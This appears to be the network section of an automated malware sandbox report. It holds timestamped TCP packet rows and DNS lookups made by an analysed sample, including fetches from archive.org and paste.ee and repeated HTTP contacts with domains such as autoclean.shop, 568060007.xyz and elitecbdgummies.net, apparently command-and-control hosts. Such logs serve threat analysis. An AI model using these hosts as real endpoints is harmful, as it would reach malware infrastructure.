                                                    Oct 10, 2024 10:00:07.582529068 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.582572937 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.582581043 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.582608938 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.582633018 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.582997084 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.583018064 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.583076000 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.583084106 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.583132982 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.583956003 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.583977938 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.584019899 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.584027052 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.584053040 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.584074974 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.643379927 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.643482924 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.643596888 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.643639088 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.643662930 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.643697977 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.643923044 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.643970013 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.644011974 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.644021988 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.644037008 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.644069910 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.644444942 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.644516945 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.644526958 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.658377886 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.658422947 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.658493042 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.658534050 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.658552885 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.672131062 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672173023 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672233105 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.672281981 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672306061 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.672777891 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672816992 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672843933 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.672866106 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.672885895 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.673680067 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.673727036 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.673763037 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.673785925 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.673803091 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.673934937 CEST44349724188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:00:07.673991919 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:00:07.674217939 CEST49724443192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:07.998758078 CEST4995180192.168.2.613.248.169.48
                                                    Oct 10, 2024 10:01:08.003588915 CEST804995113.248.169.48192.168.2.6
                                                    Oct 10, 2024 10:01:08.003691912 CEST4995180192.168.2.613.248.169.48
                                                    Oct 10, 2024 10:01:08.011338949 CEST4995180192.168.2.613.248.169.48
                                                    Oct 10, 2024 10:01:08.016113997 CEST804995113.248.169.48192.168.2.6
                                                    Oct 10, 2024 10:01:08.480681896 CEST804995113.248.169.48192.168.2.6
                                                    Oct 10, 2024 10:01:08.480739117 CEST804995113.248.169.48192.168.2.6
                                                    Oct 10, 2024 10:01:08.480866909 CEST4995180192.168.2.613.248.169.48
                                                    Oct 10, 2024 10:01:08.483984947 CEST4995180192.168.2.613.248.169.48
                                                    Oct 10, 2024 10:01:08.489228010 CEST804995113.248.169.48192.168.2.6
                                                    Oct 10, 2024 10:01:23.547806978 CEST4995480192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:23.552706957 CEST804995418.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:23.552805901 CEST4995480192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:23.557917118 CEST804995418.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:23.557972908 CEST4995480192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:23.563071966 CEST4995480192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:23.568042040 CEST804995418.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:26.216012955 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:26.362040043 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:26.362128973 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:26.371321917 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:26.376250029 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:27.277823925 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:27.277834892 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:27.277841091 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:27.277903080 CEST804995518.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:27.277972937 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:27.277972937 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:27.887696981 CEST4995580192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:29.072036982 CEST4995680192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:29.077007055 CEST804995618.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:29.077095032 CEST4995680192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:29.082227945 CEST804995618.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:29.082297087 CEST4995680192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:29.112143040 CEST4995680192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:29.117038012 CEST804995618.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:29.117156982 CEST804995618.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:31.643728018 CEST4995780192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:31.873354912 CEST804995718.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:31.873444080 CEST4995780192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:31.882190943 CEST4995780192.168.2.618.163.12.6
                                                    Oct 10, 2024 10:01:31.886926889 CEST804995718.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:31.890176058 CEST804995718.163.12.6192.168.2.6
                                                    Oct 10, 2024 10:01:37.187299967 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:37.192230940 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:37.192409992 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:37.204538107 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:37.209440947 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034039974 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034065962 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034080029 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034104109 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034118891 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034154892 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034169912 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034177065 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.034184933 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034194946 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.034200907 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034218073 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.034216881 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.034231901 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.034281015 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.039030075 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.039073944 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.039088964 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.039133072 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.090730906 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.125334024 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125370979 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125387907 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125403881 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125421047 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125441074 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.125478983 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.125556946 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125619888 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125632048 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.125634909 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125650883 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.125675917 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.127305984 CEST8049958172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:38.127367020 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:38.715822935 CEST4995880192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:39.734406948 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:39.739217997 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:39.739315987 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:39.749846935 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:39.754811049 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545531988 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545572042 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545623064 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545655012 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545677900 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.545689106 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545722961 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545734882 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.545757055 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545789957 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.545792103 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545831919 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545849085 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.545866966 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.545919895 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.550764084 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.550817966 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.550906897 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.632920980 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.632978916 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633013010 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633045912 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633080006 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633112907 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.633162022 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.633320093 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633390903 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.633542061 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633574009 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633609056 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.633632898 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:40.633975983 CEST8049959172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:40.634041071 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:41.262607098 CEST4995980192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:42.384453058 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:42.669039965 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:42.669219017 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:42.679589033 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:42.686459064 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:42.686515093 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452442884 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452483892 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452507973 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452519894 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452532053 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452543020 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452559948 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452562094 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.452573061 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452585936 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452585936 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.452599049 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.452630997 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.452650070 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.457498074 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.457530975 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.457544088 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.457617044 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.538717031 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538741112 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538755894 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538767099 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538785934 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538805962 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.538865089 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.538918018 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.539124012 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.539134979 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.539143085 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.539197922 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:43.539524078 CEST8049960172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:43.539580107 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:44.184482098 CEST4996080192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.301078081 CEST4996280192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.306559086 CEST8049962172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:45.306689978 CEST4996280192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.312073946 CEST8049962172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:45.312203884 CEST4996280192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.339699030 CEST4996280192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.342644930 CEST4996280192.168.2.6172.96.186.204
                                                    Oct 10, 2024 10:01:45.344801903 CEST8049962172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:45.347450972 CEST8049962172.96.186.204192.168.2.6
                                                    Oct 10, 2024 10:01:50.531033039 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:50.535794020 CEST8049963188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:50.535913944 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:50.547074080 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:50.551903009 CEST8049963188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:51.319740057 CEST8049963188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:51.319812059 CEST8049963188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:51.319864035 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:51.319956064 CEST8049963188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:51.319996119 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:52.059746027 CEST4996380192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:53.079689026 CEST4996480192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:53.102008104 CEST8049964188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:53.102073908 CEST4996480192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:53.107753992 CEST8049964188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:53.107819080 CEST4996480192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:53.112606049 CEST4996480192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:53.117548943 CEST8049964188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:55.641459942 CEST4996580192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:55.647334099 CEST8049965188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:55.647502899 CEST4996580192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:55.661814928 CEST4996580192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:55.666764975 CEST8049965188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:55.666775942 CEST8049965188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:56.276642084 CEST8049965188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:56.277411938 CEST8049965188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:56.277471066 CEST4996580192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:57.172477007 CEST4996580192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:58.190185070 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:58.380744934 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:58.380923986 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:58.394484997 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:58.399534941 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014542103 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014569044 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014580011 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014658928 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014671087 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014683008 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014694929 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014708042 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014719009 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014725924 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.014760017 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.015073061 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.019551992 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.019653082 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.019716978 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.101361990 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101373911 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101504087 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101521015 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101535082 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101546049 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101557016 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.101588964 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.101644039 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.102345943 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.102400064 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.102480888 CEST8049966188.114.96.3192.168.2.6
                                                    Oct 10, 2024 10:01:59.102533102 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.107901096 CEST4996680192.168.2.6188.114.96.3
                                                    Oct 10, 2024 10:01:59.113018036 CEST8049966188.114.96.3192.168.2.6
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 10, 2024 10:00:00.094098091 CEST5821253192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:00:00.356981039 CEST53582121.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:00:06.318526030 CEST6019053192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:00:06.329044104 CEST53601901.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:01:07.978348017 CEST6448253192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:01:07.992885113 CEST53644821.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:01:23.531774044 CEST6445453192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:01:23.545423985 CEST53644541.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:01:36.913362980 CEST5950553192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:01:37.184884071 CEST53595051.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:01:50.360160112 CEST5114653192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:01:50.528606892 CEST53511461.1.1.1192.168.2.6
                                                    Oct 10, 2024 10:02:04.688082933 CEST6014953192.168.2.61.1.1.1
                                                    Oct 10, 2024 10:02:04.700972080 CEST53601491.1.1.1192.168.2.6
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 10, 2024 10:00:00.094098091 CEST192.168.2.61.1.1.10x21cStandard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:00:06.318526030 CEST192.168.2.61.1.1.10xb666Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:07.978348017 CEST192.168.2.61.1.1.10x92bbStandard query (0)www.autoclean.shopA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:23.531774044 CEST192.168.2.61.1.1.10xf376Standard query (0)www.568060007.xyzA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:36.913362980 CEST192.168.2.61.1.1.10xeef9Standard query (0)www.elitecbdgummies.netA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:50.360160112 CEST192.168.2.61.1.1.10xf102Standard query (0)www.airgame.storeA (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:02:04.688082933 CEST192.168.2.61.1.1.10xa222Standard query (0)www.1ns6mg.vipA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 10, 2024 10:00:00.356981039 CEST1.1.1.1192.168.2.60x21cNo error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:00:06.329044104 CEST1.1.1.1192.168.2.60xb666No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:00:06.329044104 CEST1.1.1.1192.168.2.60xb666No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:07.992885113 CEST1.1.1.1192.168.2.60x92bbNo error (0)www.autoclean.shop13.248.169.48A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:07.992885113 CEST1.1.1.1192.168.2.60x92bbNo error (0)www.autoclean.shop76.223.54.146A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:23.545423985 CEST1.1.1.1192.168.2.60xf376No error (0)www.568060007.xyz568060007.xyzCNAME (Canonical name)IN (0x0001)false
                                                    Oct 10, 2024 10:01:23.545423985 CEST1.1.1.1192.168.2.60xf376No error (0)568060007.xyz18.163.12.6A (IP address)IN (0x0001)false
                                                    Oct 10, 2024 10:01:37.184884071 CEST1.1.1.1192.168.2.60xeef9No error (0)www.elitecbdgummies.netelitecbdgummies.netCNAME (Canonical name)IN (0x0001)false
                                                    Oct 10, 2024 10:01:37.184884071 CEST1.1.1.1192.168.2.60xeef9No error (0)elitecbdgummies.net172.96.186.204A (IP address)IN (0x0001)false
